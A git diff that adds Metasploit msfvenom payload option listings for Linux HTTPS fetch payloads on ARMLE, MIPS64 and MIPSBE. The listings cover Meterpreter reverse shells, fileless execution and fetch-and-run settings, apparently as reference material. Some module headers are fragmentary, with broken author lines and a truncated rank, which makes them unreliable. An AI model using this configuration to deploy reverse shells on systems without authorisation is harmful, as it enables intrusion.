+FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TQHUGlZxwFFG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..579fb11 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mips64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mips64/meterpreter_reverse_http: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME svCIEhTaT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPS64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..7564c08 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mips64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/mips64/meterpreter_reverse_https: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LYGkIKKpd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPS64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..df59f94 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mips64-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mips64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mips64/meterpreter_reverse_tcp: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ATidwOWU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPS64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-exec.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-exec.txt new file mode 100644 index 0000000..0bad6a6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-exec.txt @@ -0,0 +1,74 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/mipsbe/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ucxPMdIJiG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..d330e58 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter-reverse_tcp.txt @@ -0,0 +1,105 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Norm +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kTkHzsICcJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..cd920b8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsbe-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsbe/meterpreter_reverse_http: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gIHyrdPWyj no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from an HTTPS server. + + + Name 